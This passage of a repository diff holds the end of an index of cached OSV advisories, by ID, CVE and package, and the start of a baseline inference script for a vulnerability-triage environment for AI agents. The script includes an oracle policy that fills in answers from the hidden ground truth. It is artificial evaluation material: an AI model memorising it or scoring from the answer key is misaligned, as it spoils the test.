    { "osv_id": "PYSEC-2020-9", "file": "data/snapshots/PYSEC-2020-9.json", "cve_id": "CVE-2020-1737", "package": "ansible" },
    { "osv_id": "PYSEC-2021-1", "file": "data/snapshots/PYSEC-2021-1.json", "cve_id": "CVE-2021-20228", "package": "ansible" },
    { "osv_id": "PYSEC-2021-105", "file": "data/snapshots/PYSEC-2021-105.json", "cve_id": "CVE-2020-10729", "package": "ansible" },
    { "osv_id": "PYSEC-2021-106", "file": "data/snapshots/PYSEC-2021-106.json", "cve_id": "CVE-2021-20178", "package": "ansible" },
    { "osv_id": "PYSEC-2021-107", "file": "data/snapshots/PYSEC-2021-107.json", "cve_id": "CVE-2021-3447", "package": "ansible" },
    { "osv_id": "PYSEC-2021-122", "file": "data/snapshots/PYSEC-2021-122.json", "cve_id": "CVE-2021-35936", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2021-124", "file": "data/snapshots/PYSEC-2021-124.json", "cve_id": "CVE-2021-20191", "package": "ansible" },
    { "osv_id": "PYSEC-2021-125", "file": "data/snapshots/PYSEC-2021-125.json", "cve_id": null, "package": "ansible" },
    { "osv_id": "PYSEC-2021-126", "file": "data/snapshots/PYSEC-2021-126.json", "cve_id": "CVE-2021-3533", "package": "ansible" },
    { "osv_id": "PYSEC-2021-2", "file": "data/snapshots/PYSEC-2021-2.json", "cve_id": "CVE-2021-26559", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2021-3", "file": "data/snapshots/PYSEC-2021-3.json", "cve_id": "CVE-2021-26697", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2021-326", "file": "data/snapshots/PYSEC-2021-326.json", "cve_id": "CVE-2021-38540", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2021-335", "file": "data/snapshots/PYSEC-2021-335.json", "cve_id": "CVE-2021-32807", "package": "accesscontrol" },
    { "osv_id": "PYSEC-2021-358", "file": "data/snapshots/PYSEC-2021-358.json", "cve_id": "CVE-2021-3583", "package": "ansible" },
    { "osv_id": "PYSEC-2021-370", "file": "data/snapshots/PYSEC-2021-370.json", "cve_id": "CVE-2021-32807", "package": "accesscontrol" },
    { "osv_id": "PYSEC-2021-4", "file": "data/snapshots/PYSEC-2021-4.json", "cve_id": "CVE-2021-28359", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2021-76", "file": "data/snapshots/PYSEC-2021-76.json", "cve_id": "CVE-2021-21330", "package": "aiohttp" },
    { "osv_id": "PYSEC-2021-839", "file": "data/snapshots/PYSEC-2021-839.json", "cve_id": "CVE-2021-43775", "package": "aim" },
    { "osv_id": "PYSEC-2021-840", "file": "data/snapshots/PYSEC-2021-840.json", "cve_id": "CVE-2021-3840", "package": "antilles-tools" },
    { "osv_id": "PYSEC-2021-876", "file": "data/snapshots/PYSEC-2021-876.json", "cve_id": "CVE-2020-13922", "package": "apache-dolphinscheduler" },
    { "osv_id": "PYSEC-2022-11", "file": "data/snapshots/PYSEC-2022-11.json", "cve_id": "CVE-2021-45230", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-164", "file": "data/snapshots/PYSEC-2022-164.json", "cve_id": "CVE-2021-3620", "package": "ansible" },
    { "osv_id": "PYSEC-2022-176", "file": "data/snapshots/PYSEC-2022-176.json", "cve_id": "CVE-2022-25598", "package": "apache-dolphinscheduler" },
    { "osv_id": "PYSEC-2022-182", "file": "data/snapshots/PYSEC-2022-182.json", "cve_id": "CVE-2018-25033", "package": "admesh" },
    { "osv_id": "PYSEC-2022-253", "file": "data/snapshots/PYSEC-2022-253.json", "cve_id": "CVE-2021-4041", "package": "ansible-runner" },
    { "osv_id": "PYSEC-2022-261", "file": "data/snapshots/PYSEC-2022-261.json", "cve_id": "CVE-2022-38170", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-263", "file": "data/snapshots/PYSEC-2022-263.json", "cve_id": "CVE-2022-38054", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-279", "file": "data/snapshots/PYSEC-2022-279.json", "cve_id": "CVE-2022-40604", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-280", "file": "data/snapshots/PYSEC-2022-280.json", "cve_id": "CVE-2022-40754", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-29", "file": "data/snapshots/PYSEC-2022-29.json", "cve_id": "CVE-2021-45229", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-30", "file": "data/snapshots/PYSEC-2022-30.json", "cve_id": "CVE-2022-24288", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42970", "file": "data/snapshots/PYSEC-2022-42970.json", "cve_id": "CVE-2022-43982", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42971", "file": "data/snapshots/PYSEC-2022-42971.json", "cve_id": "CVE-2022-43985", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42972", "file": "data/snapshots/PYSEC-2022-42972.json", "cve_id": "CVE-2022-43766", "package": "apache-iotdb" },
    { "osv_id": "PYSEC-2022-42981", "file": "data/snapshots/PYSEC-2022-42981.json", "cve_id": "CVE-2022-27949", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42982", "file": "data/snapshots/PYSEC-2022-42982.json", "cve_id": "CVE-2022-40127", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42983", "file": "data/snapshots/PYSEC-2022-42983.json", "cve_id": "CVE-2022-41672", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-42984", "file": "data/snapshots/PYSEC-2022-42984.json", "cve_id": "CVE-2022-45402", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2022-43059", "file": "data/snapshots/PYSEC-2022-43059.json", "cve_id": null, "package": "aiohttp" },
    { "osv_id": "PYSEC-2022-43060", "file": "data/snapshots/PYSEC-2022-43060.json", "cve_id": "CVE-2022-32531", "package": "apache-bookkeeper-client" },
    { "osv_id": "PYSEC-2022-43066", "file": "data/snapshots/PYSEC-2022-43066.json", "cve_id": null, "package": "aamiles" },
    { "osv_id": "PYSEC-2022-43067", "file": "data/snapshots/PYSEC-2022-43067.json", "cve_id": "CVE-2021-3701", "package": "ansible-runner" },
    { "osv_id": "PYSEC-2022-43068", "file": "data/snapshots/PYSEC-2022-43068.json", "cve_id": "CVE-2021-3702", "package": "ansible-runner" },
    { "osv_id": "PYSEC-2022-43069", "file": "data/snapshots/PYSEC-2022-43069.json", "cve_id": "CVE-2022-38369", "package": "apache-iotdb" },
    { "osv_id": "PYSEC-2022-43070", "file": "data/snapshots/PYSEC-2022-43070.json", "cve_id": null, "package": "apache-iotdb" },
    { "osv_id": "PYSEC-2023-1", "file": "data/snapshots/PYSEC-2023-1.json", "cve_id": null, "package": "adyen" },
    { "osv_id": "PYSEC-2023-103", "file": "data/snapshots/PYSEC-2023-103.json", "cve_id": "CVE-2022-46651", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-104", "file": "data/snapshots/PYSEC-2023-104.json", "cve_id": "CVE-2023-22887", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-105", "file": "data/snapshots/PYSEC-2023-105.json", "cve_id": "CVE-2023-22888", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-106", "file": "data/snapshots/PYSEC-2023-106.json", "cve_id": "CVE-2023-36543", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-119", "file": "data/snapshots/PYSEC-2023-119.json", "cve_id": "CVE-2023-35908", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-120", "file": "data/snapshots/PYSEC-2023-120.json", "cve_id": "CVE-2023-37276", "package": "aiohttp" },
    { "osv_id": "PYSEC-2023-134", "file": "data/snapshots/PYSEC-2023-134.json", "cve_id": "CVE-2023-39508", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-136", "file": "data/snapshots/PYSEC-2023-136.json", "cve_id": "CVE-2023-39553", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-152", "file": "data/snapshots/PYSEC-2023-152.json", "cve_id": "CVE-2023-37379", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-156", "file": "data/snapshots/PYSEC-2023-156.json", "cve_id": "CVE-2023-40195", "package": "apache-airflow-providers-apache-spark" },
    { "osv_id": "PYSEC-2023-158", "file": "data/snapshots/PYSEC-2023-158.json", "cve_id": "CVE-2023-40273", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-170", "file": "data/snapshots/PYSEC-2023-170.json", "cve_id": "CVE-2023-40611", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-171", "file": "data/snapshots/PYSEC-2023-171.json", "cve_id": "CVE-2023-40712", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-197", "file": "data/snapshots/PYSEC-2023-197.json", "cve_id": "CVE-2023-42663", "package": "apache-airflow" },
    { "osv_id": "PYSEC-2023-2", "file": "data/snapshots/PYSEC-2023-2.json", "cve_id": "CVE-2023-25695", "package": "apache-airflow" },
+
{
|
| 953 |
+
"osv_id": "PYSEC-2023-202",
|
| 954 |
+
"file": "data/snapshots/PYSEC-2023-202.json",
|
| 955 |
+
"cve_id": "CVE-2023-42780",
|
| 956 |
+
"package": "apache-airflow"
|
| 957 |
+
},
|
| 958 |
+
{
|
| 959 |
+
"osv_id": "PYSEC-2023-203",
|
| 960 |
+
"file": "data/snapshots/PYSEC-2023-203.json",
|
| 961 |
+
"cve_id": "CVE-2023-42792",
|
| 962 |
+
"package": "apache-airflow"
|
| 963 |
+
},
|
| 964 |
+
{
|
| 965 |
+
"osv_id": "PYSEC-2023-204",
|
| 966 |
+
"file": "data/snapshots/PYSEC-2023-204.json",
|
| 967 |
+
"cve_id": "CVE-2023-45348",
|
| 968 |
+
"package": "apache-airflow"
|
| 969 |
+
},
|
| 970 |
+
{
|
| 971 |
+
"osv_id": "PYSEC-2023-218",
|
| 972 |
+
"file": "data/snapshots/PYSEC-2023-218.json",
|
| 973 |
+
"cve_id": "CVE-2023-46288",
|
| 974 |
+
"package": "apache-airflow"
|
| 975 |
+
},
|
| 976 |
+
{
|
| 977 |
+
"osv_id": "PYSEC-2023-231",
|
| 978 |
+
"file": "data/snapshots/PYSEC-2023-231.json",
|
| 979 |
+
"cve_id": "CVE-2023-42781",
|
| 980 |
+
"package": "apache-airflow"
|
| 981 |
+
},
|
| 982 |
+
{
|
| 983 |
+
"osv_id": "PYSEC-2023-232",
|
| 984 |
+
"file": "data/snapshots/PYSEC-2023-232.json",
|
| 985 |
+
"cve_id": "CVE-2023-47037",
|
| 986 |
+
"package": "apache-airflow"
|
| 987 |
+
},
|
| 988 |
+
{
|
| 989 |
+
"osv_id": "PYSEC-2023-246",
|
| 990 |
+
"file": "data/snapshots/PYSEC-2023-246.json",
|
| 991 |
+
"cve_id": "CVE-2023-47627",
|
| 992 |
+
"package": "aiohttp"
|
| 993 |
+
},
|
| 994 |
+
{
|
| 995 |
+
"osv_id": "PYSEC-2023-247",
|
| 996 |
+
"file": "data/snapshots/PYSEC-2023-247.json",
|
| 997 |
+
"cve_id": "CVE-2023-47641",
|
| 998 |
+
"package": "aiohttp"
|
| 999 |
+
},
|
| 1000 |
+
{
|
| 1001 |
+
"osv_id": "PYSEC-2023-250",
|
| 1002 |
+
"file": "data/snapshots/PYSEC-2023-250.json",
|
| 1003 |
+
"cve_id": "CVE-2023-49081",
|
| 1004 |
+
"package": "aiohttp"
|
| 1005 |
+
},
|
| 1006 |
+
{
|
| 1007 |
+
"osv_id": "PYSEC-2023-251",
|
| 1008 |
+
"file": "data/snapshots/PYSEC-2023-251.json",
|
| 1009 |
+
"cve_id": "CVE-2023-49082",
|
| 1010 |
+
"package": "aiohttp"
|
| 1011 |
+
},
|
| 1012 |
+
{
|
| 1013 |
+
"osv_id": "PYSEC-2023-263",
|
| 1014 |
+
"file": "data/snapshots/PYSEC-2023-263.json",
|
| 1015 |
+
"cve_id": null,
|
| 1016 |
+
"package": "admesh"
|
| 1017 |
+
},
|
| 1018 |
+
{
|
| 1019 |
+
"osv_id": "PYSEC-2023-264",
|
| 1020 |
+
"file": "data/snapshots/PYSEC-2023-264.json",
|
| 1021 |
+
"cve_id": "CVE-2023-47265",
|
| 1022 |
+
"package": "apache-airflow"
|
| 1023 |
+
},
|
| 1024 |
+
{
|
| 1025 |
+
"osv_id": "PYSEC-2023-265",
|
| 1026 |
+
"file": "data/snapshots/PYSEC-2023-265.json",
|
| 1027 |
+
"cve_id": "CVE-2023-48291",
|
| 1028 |
+
"package": "apache-airflow"
|
| 1029 |
+
},
|
| 1030 |
+
{
|
| 1031 |
+
"osv_id": "PYSEC-2023-266",
|
| 1032 |
+
"file": "data/snapshots/PYSEC-2023-266.json",
|
| 1033 |
+
"cve_id": "CVE-2023-49920",
|
| 1034 |
+
"package": "apache-airflow"
|
| 1035 |
+
},
|
| 1036 |
+
{
|
| 1037 |
+
"osv_id": "PYSEC-2023-267",
|
| 1038 |
+
"file": "data/snapshots/PYSEC-2023-267.json",
|
| 1039 |
+
"cve_id": "CVE-2023-50783",
|
| 1040 |
+
"package": "apache-airflow"
|
| 1041 |
+
},
|
| 1042 |
+
{
|
| 1043 |
+
"osv_id": "PYSEC-2023-268",
|
| 1044 |
+
"file": "data/snapshots/PYSEC-2023-268.json",
|
| 1045 |
+
"cve_id": "CVE-2023-48796",
|
| 1046 |
+
"package": "apache-dolphinscheduler"
|
| 1047 |
+
},
|
| 1048 |
+
{
|
| 1049 |
+
"osv_id": "PYSEC-2023-3",
|
| 1050 |
+
"file": "data/snapshots/PYSEC-2023-3.json",
|
| 1051 |
+
"cve_id": "CVE-2023-28707",
|
| 1052 |
+
"package": "apache-airflow"
|
| 1053 |
+
},
|
| 1054 |
+
{
|
| 1055 |
+
"osv_id": "PYSEC-2023-4",
|
| 1056 |
+
"file": "data/snapshots/PYSEC-2023-4.json",
|
| 1057 |
+
"cve_id": "CVE-2022-45875",
|
| 1058 |
+
"package": "apache-dolphinscheduler"
|
| 1059 |
+
},
|
| 1060 |
+
{
|
| 1061 |
+
"osv_id": "PYSEC-2023-5",
|
| 1062 |
+
"file": "data/snapshots/PYSEC-2023-5.json",
|
| 1063 |
+
"cve_id": "CVE-2023-24829",
|
| 1064 |
+
"package": "apache-iotdb"
|
| 1065 |
+
},
|
| 1066 |
+
{
|
| 1067 |
+
"osv_id": "PYSEC-2023-59",
|
| 1068 |
+
"file": "data/snapshots/PYSEC-2023-59.json",
|
| 1069 |
+
"cve_id": "CVE-2023-25754",
|
| 1070 |
+
"package": "apache-airflow"
|
| 1071 |
+
},
|
| 1072 |
+
{
|
| 1073 |
+
"osv_id": "PYSEC-2023-6",
|
| 1074 |
+
"file": "data/snapshots/PYSEC-2023-6.json",
|
| 1075 |
+
"cve_id": "CVE-2023-24830",
|
| 1076 |
+
"package": "apache-iotdb"
|
| 1077 |
+
},
|
| 1078 |
+
{
|
| 1079 |
+
"osv_id": "PYSEC-2023-60",
|
| 1080 |
+
"file": "data/snapshots/PYSEC-2023-60.json",
|
| 1081 |
+
"cve_id": "CVE-2023-29247",
|
| 1082 |
+
"package": "apache-airflow"
|
| 1083 |
+
},
|
| 1084 |
+
{
|
| 1085 |
+
"osv_id": "PYSEC-2023-7",
|
| 1086 |
+
"file": "data/snapshots/PYSEC-2023-7.json",
|
| 1087 |
+
"cve_id": "CVE-2023-24831",
|
| 1088 |
+
"package": "apache-iotdb"
|
| 1089 |
+
},
|
| 1090 |
+
{
|
| 1091 |
+
"osv_id": "PYSEC-2023-8",
|
| 1092 |
+
"file": "data/snapshots/PYSEC-2023-8.json",
|
| 1093 |
+
"cve_id": "CVE-2023-30771",
|
| 1094 |
+
"package": "apache-iotdb"
|
| 1095 |
+
},
|
| 1096 |
+
{
|
| 1097 |
+
"osv_id": "PYSEC-2023-89",
|
| 1098 |
+
"file": "data/snapshots/PYSEC-2023-89.json",
|
| 1099 |
+
"cve_id": "CVE-2023-35005",
|
| 1100 |
+
"package": "apache-airflow"
|
| 1101 |
+
},
|
| 1102 |
+
{
|
| 1103 |
+
"osv_id": "PYSEC-2024-13",
|
| 1104 |
+
"file": "data/snapshots/PYSEC-2024-13.json",
|
| 1105 |
+
"cve_id": "CVE-2023-50943",
|
| 1106 |
+
"package": "apache-airflow"
|
| 1107 |
+
},
|
| 1108 |
+
{
|
| 1109 |
+
"osv_id": "PYSEC-2024-14",
|
| 1110 |
+
"file": "data/snapshots/PYSEC-2024-14.json",
|
| 1111 |
+
"cve_id": "CVE-2023-50944",
|
| 1112 |
+
"package": "apache-airflow"
|
| 1113 |
+
},
|
| 1114 |
+
{
|
| 1115 |
+
"osv_id": "PYSEC-2024-152",
|
| 1116 |
+
"file": "data/snapshots/PYSEC-2024-152.json",
|
| 1117 |
+
"cve_id": null,
|
| 1118 |
+
"package": "aiocpa"
|
| 1119 |
+
},
|
| 1120 |
+
{
|
| 1121 |
+
"osv_id": "PYSEC-2024-181",
|
| 1122 |
+
"file": "data/snapshots/PYSEC-2024-181.json",
|
| 1123 |
+
"cve_id": "CVE-2024-41937",
|
| 1124 |
+
"package": "apache-airflow"
|
| 1125 |
+
},
|
| 1126 |
+
{
|
| 1127 |
+
"osv_id": "PYSEC-2024-182",
|
| 1128 |
+
"file": "data/snapshots/PYSEC-2024-182.json",
|
| 1129 |
+
"cve_id": "CVE-2024-45784",
|
| 1130 |
+
"package": "apache-airflow"
|
| 1131 |
+
},
|
| 1132 |
+
{
|
| 1133 |
+
"osv_id": "PYSEC-2024-189",
|
| 1134 |
+
"file": "data/snapshots/PYSEC-2024-189.json",
|
| 1135 |
+
"cve_id": "CVE-2024-39863",
|
| 1136 |
+
"package": "apache-airflow"
|
| 1137 |
+
},
|
| 1138 |
+
{
|
| 1139 |
+
"osv_id": "PYSEC-2024-190",
|
| 1140 |
+
"file": "data/snapshots/PYSEC-2024-190.json",
|
| 1141 |
+
"cve_id": "CVE-2024-39877",
|
| 1142 |
+
"package": "apache-airflow"
|
| 1143 |
+
},
|
| 1144 |
+
{
|
| 1145 |
+
"osv_id": "PYSEC-2024-195",
|
| 1146 |
+
"file": "data/snapshots/PYSEC-2024-195.json",
|
| 1147 |
+
"cve_id": "CVE-2024-25142",
|
| 1148 |
+
"package": "apache-airflow"
|
| 1149 |
+
},
|
| 1150 |
+
{
|
| 1151 |
+
"osv_id": "PYSEC-2024-212",
|
| 1152 |
+
"file": "data/snapshots/PYSEC-2024-212.json",
|
| 1153 |
+
"cve_id": "CVE-2024-45034",
|
| 1154 |
+
"package": "apache-airflow"
|
| 1155 |
+
},
|
| 1156 |
+
{
|
| 1157 |
+
"osv_id": "PYSEC-2024-221",
|
| 1158 |
+
"file": "data/snapshots/PYSEC-2024-221.json",
|
| 1159 |
+
"cve_id": "CVE-2024-27305",
|
| 1160 |
+
"package": "aiosmtpd"
|
| 1161 |
+
},
|
| 1162 |
+
{
|
| 1163 |
+
"osv_id": "PYSEC-2024-24",
|
| 1164 |
+
"file": "data/snapshots/PYSEC-2024-24.json",
|
| 1165 |
+
"cve_id": "CVE-2024-23334",
|
| 1166 |
+
"package": "aiohttp"
|
| 1167 |
+
},
|
| 1168 |
+
{
|
| 1169 |
+
"osv_id": "PYSEC-2024-245",
|
| 1170 |
+
"file": "data/snapshots/PYSEC-2024-245.json",
|
| 1171 |
+
"cve_id": "CVE-2024-27906",
|
| 1172 |
+
"package": "apache-airflow"
|
| 1173 |
+
},
|
| 1174 |
+
{
|
| 1175 |
+
"osv_id": "PYSEC-2024-26",
|
| 1176 |
+
"file": "data/snapshots/PYSEC-2024-26.json",
|
| 1177 |
+
"cve_id": "CVE-2024-23829",
|
| 1178 |
+
"package": "aiohttp"
|
| 1179 |
+
},
|
| 1180 |
+
{
|
| 1181 |
+
"osv_id": "PYSEC-2024-36",
|
| 1182 |
+
"file": "data/snapshots/PYSEC-2024-36.json",
|
| 1183 |
+
"cve_id": "CVE-2024-0690",
|
| 1184 |
+
"package": "ansible-core"
|
| 1185 |
+
},
|
| 1186 |
+
{
|
| 1187 |
+
"osv_id": "PYSEC-2024-42",
|
| 1188 |
+
"file": "data/snapshots/PYSEC-2024-42.json",
|
| 1189 |
+
"cve_id": "CVE-2024-26280",
|
| 1190 |
+
"package": "apache-airflow"
|
| 1191 |
+
},
|
| 1192 |
+
{
|
| 1193 |
+
"osv_id": "PYSEC-2024-46",
|
| 1194 |
+
"file": "data/snapshots/PYSEC-2024-46.json",
|
| 1195 |
+
"cve_id": "CVE-2024-28746",
|
| 1196 |
+
"package": "apache-airflow"
|
| 1197 |
+
},
|
| 1198 |
+
{
|
| 1199 |
+
"osv_id": "PYSEC-2025-51",
|
| 1200 |
+
"file": "data/snapshots/PYSEC-2025-51.json",
|
| 1201 |
+
"cve_id": "CVE-2025-50213",
|
| 1202 |
+
"package": "apache-airflow-providers-snowflake"
|
| 1203 |
+
}
|
| 1204 |
+
]
|
| 1205 |
+
}
|
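The index above maps each cached OSV advisory to its snapshot file, its CVE alias (null when none was assigned), and the affected PyPI package. A minimal stdlib sketch for querying it offline; the grouping loop is illustrative and not part of the repo:

import json
from pathlib import Path

# Load the snapshot index and group cached advisories by package name.
index = json.loads(Path("data/snapshot_index.json").read_text(encoding="utf-8"))
by_package = {}
for entry in index["snapshots"]:
    by_package.setdefault(entry["package"], []).append(entry["osv_id"])

print(index["count"], "snapshots cached")
print(sorted(by_package.get("aiohttp", [])))  # e.g. ['PYSEC-2022-43059', 'PYSEC-2023-120', ...]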
inference.py
ADDED
@@ -0,0 +1,313 @@
"""Baseline inference script for the vulnerability triage environment."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import argparse
|
| 6 |
+
import json
|
| 7 |
+
import os
|
| 8 |
+
from typing import Dict, List, Optional
|
| 9 |
+
|
| 10 |
+
from openai import OpenAI
|
| 11 |
+
from openenv.core import GenericEnvClient
|
| 12 |
+
|
| 13 |
+
API_BASE_URL = os.getenv("API_BASE_URL", "https://api.openai.com/v1")
|
| 14 |
+
MODEL_NAME = os.getenv("MODEL_NAME", "gpt-4o-mini")
|
| 15 |
+
HF_TOKEN = os.getenv("HF_TOKEN")
|
| 16 |
+
|
| 17 |
+
from models import VulnTriageAction
|
| 18 |
+
from server.cases import TASK_ORDER, get_case_definition
|
| 19 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
SYSTEM_PROMPT = """You are triaging open-source vulnerability reports.
|
| 23 |
+
Return ONLY a single JSON object — no prose, no markdown — with exactly these keys:
|
| 24 |
+
action_type : string (required) — one of the action types listed in available_actions
|
| 25 |
+
evidence_id : string (optional) — only used with inspect_evidence
|
| 26 |
+
value : string (optional) — a PLAIN STRING, never an object or array
|
| 27 |
+
rationale : string (required) — one short sentence
|
| 28 |
+
|
| 29 |
+
Valid action_type values and their expected value strings:
|
| 30 |
+
read_report — no value needed
|
| 31 |
+
inspect_evidence — set evidence_id to one id from available_evidence
|
| 32 |
+
search_nvd_database — value: CVE ID (e.g. CVE-2023-1234) found in report aliases
|
| 33 |
+
fetch_commit_diff — value: commit hash or hash fragment found in references
|
| 34 |
+
message_maintainer — value: a question for the maintainer (e.g. "Is there a patch?")
|
| 35 |
+
set_validity — value: "valid" | "invalid" | "needs_more_info"
|
| 36 |
+
set_affected_package — value: package name string, e.g. "guarddog"
|
| 37 |
+
set_affected_versions — value: semver range string, e.g. "<0.1.5"
|
| 38 |
+
set_severity — value: "low" | "medium" | "high" | "critical"
|
| 39 |
+
set_exploitability — value: "low" | "medium" | "high"
|
| 40 |
+
set_next_action — value: "patch" | "publish_advisory" | "close" | "escalate" | "request_info"
|
| 41 |
+
set_missing_information — value: one missing info item as a plain string
|
| 42 |
+
submit_triage — no value needed
|
| 43 |
+
|
| 44 |
+
Strategy: read_report first, then use tools (search_nvd, fetch_commit, message_maintainer) to unlock hidden evidence, then fill all draft fields, then submit.
|
| 45 |
+
Note: You CANNOT inspect "nvd_assessment", "github_commit_diff", or "vendor_status" directly. You must use the tools above to reveal them.
|
| 46 |
+
"""
|
| 47 |
+
|
| 48 |
+
|
| 49 |
+
def get_openai_client() -> OpenAI:
|
| 50 |
+
api_key = HF_TOKEN or os.getenv("OPENAI_API_KEY")
|
| 51 |
+
if not api_key:
|
| 52 |
+
raise RuntimeError("Set HF_TOKEN before running the OpenAI baseline.")
|
| 53 |
+
|
| 54 |
+
kwargs = {"api_key": api_key}
|
| 55 |
+
if API_BASE_URL:
|
| 56 |
+
kwargs["base_url"] = API_BASE_URL
|
| 57 |
+
return OpenAI(**kwargs)
|
| 58 |
+
|
| 59 |
+
|
| 60 |
+
def parse_json_response(text: str) -> Dict[str, str]:
|
| 61 |
+
"""Extract the first valid JSON object from a model response.
|
| 62 |
+
|
| 63 |
+
Handles:
|
| 64 |
+
- Markdown fences (```json ... ```)
|
| 65 |
+
- Think-blocks from reasoning models (<think>...</think>)
|
| 66 |
+
- Surrounding prose before/after the JSON object
|
| 67 |
+
"""
|
| 68 |
+
import re as _re
|
| 69 |
+
text = text.strip()
|
| 70 |
+
# Strip reasoning/think blocks produced by models like Qwen3 or DeepSeek
|
| 71 |
+
text = _re.sub(r"<think>.*?</think>", "", text, flags=_re.DOTALL | _re.IGNORECASE).strip()
|
| 72 |
+
# Strip markdown fences
|
| 73 |
+
if "```" in text:
|
| 74 |
+
lines = [ln for ln in text.splitlines() if not ln.strip().startswith("```")]
|
| 75 |
+
text = "\n".join(lines).strip()
|
| 76 |
+
# Find the first complete JSON object by bracket matching
|
| 77 |
+
start = text.find("{")
|
| 78 |
+
if start == -1:
|
| 79 |
+
raise ValueError(f"No JSON object found in model response: {text[:200]!r}")
|
| 80 |
+
depth = 0
|
| 81 |
+
in_string = False
|
| 82 |
+
escape = False
|
| 83 |
+
for i, ch in enumerate(text[start:], start):
|
| 84 |
+
if escape:
|
| 85 |
+
escape = False
|
| 86 |
+
continue
|
| 87 |
+
if ch == "\\" and in_string:
|
| 88 |
+
escape = True
|
| 89 |
+
continue
|
| 90 |
+
if ch == '"' and not escape:
|
| 91 |
+
in_string = not in_string
|
| 92 |
+
if in_string:
|
| 93 |
+
continue
|
| 94 |
+
if ch == "{":
|
| 95 |
+
depth += 1
|
| 96 |
+
elif ch == "}":
|
| 97 |
+
depth -= 1
|
| 98 |
+
if depth == 0:
|
| 99 |
+
return json.loads(text[start : i + 1])
|
| 100 |
+
raise ValueError(f"Incomplete JSON object in model response: {text[:200]!r}")
|
| 101 |
+
|
| 102 |
+
|
| 103 |
+
def heuristic_policy(observation: Dict) -> Dict[str, str]:
|
| 104 |
+
if "read_report" not in observation["action_history"]:
|
| 105 |
+
return {"action_type": "read_report", "rationale": "Start by reading the report"}
|
| 106 |
+
|
| 107 |
+
truth = get_case_definition(observation["task_id"]).truth
|
| 108 |
+
supporting_evidence_ids = set(truth.supporting_evidence_ids)
|
| 109 |
+
visible_ids = {item["evidence_id"] for item in observation["visible_evidence"]}
|
| 110 |
+
|
| 111 |
+
remaining_supporting = [
|
| 112 |
+
evidence_id
|
| 113 |
+
for evidence_id in observation["available_evidence"]
|
| 114 |
+
if evidence_id in supporting_evidence_ids and evidence_id not in visible_ids
|
| 115 |
+
]
|
| 116 |
+
if remaining_supporting:
|
| 117 |
+
eval_id = remaining_supporting[0]
|
| 118 |
+
# Interactive Tools Support:
|
| 119 |
+
if eval_id == "nvd_assessment":
|
| 120 |
+
# The oracle magically knows the OSV ID to query (alias)
|
| 121 |
+
from server.cases import SEEDS
|
| 122 |
+
seed = SEEDS[observation["task_id"]]
|
| 123 |
+
return {"action_type": "search_nvd_database", "value": seed.osv_id, "rationale": "Fetch NVD dynamically"}
|
| 124 |
+
elif eval_id == "github_commit_diff":
|
| 125 |
+
# Match any random commit substring
|
| 126 |
+
return {"action_type": "fetch_commit_diff", "value": "Commit", "rationale": "Fetch Diff dynamically"}
|
| 127 |
+
elif eval_id == "vendor_status":
|
| 128 |
+
return {"action_type": "message_maintainer", "value": "Is there an ETA for a patch?", "rationale": "Chat with maintainer"}
|
| 129 |
+
|
| 130 |
+
return {
|
| 131 |
+
"action_type": "inspect_evidence",
|
| 132 |
+
"evidence_id": eval_id,
|
| 133 |
+
"rationale": "Reveal the next supporting evidence item",
|
| 134 |
+
}
|
| 135 |
+
|
| 136 |
+
draft = observation["draft"]
|
| 137 |
+
score = observation["score_breakdown"]
|
| 138 |
+
|
| 139 |
+
by_truth = [
|
| 140 |
+
("set_validity", truth.validity),
|
| 141 |
+
("set_affected_package", truth.affected_package),
|
| 142 |
+
("set_affected_versions", truth.affected_versions),
|
| 143 |
+
("set_severity", truth.severity),
|
| 144 |
+
("set_exploitability", truth.exploitability),
|
| 145 |
+
("set_next_action", truth.next_action),
|
| 146 |
+
]
|
| 147 |
+
|
| 148 |
+
for action_type, value in by_truth:
|
| 149 |
+
if draft[action_type.replace("set_", "")] != value:
|
| 150 |
+
return {"action_type": action_type, "value": value, "rationale": "Update the draft"}
|
| 151 |
+
|
| 152 |
+
# Submit any required missing-information items not yet recorded in the draft
|
| 153 |
+
existing_mi = {v.strip().lower() for v in draft.get("missing_information", [])}
|
| 154 |
+
for mi_item in truth.missing_information:
|
| 155 |
+
if mi_item.strip().lower() not in existing_mi:
|
| 156 |
+
return {
|
| 157 |
+
"action_type": "set_missing_information",
|
| 158 |
+
"value": mi_item,
|
| 159 |
+
"rationale": "Record known missing information",
|
| 160 |
+
}
|
| 161 |
+
|
| 162 |
+
return {"action_type": "submit_triage", "rationale": f"Current total score is {score['total']}"}
|
| 163 |
+
|
| 164 |
+
|
| 165 |
+
def llm_policy(client: OpenAI, model_name: str, observation: Dict) -> Dict[str, str]:
|
| 166 |
+
response = client.chat.completions.create(
|
| 167 |
+
model=model_name,
|
| 168 |
+
temperature=0,
|
| 169 |
+
messages=[
|
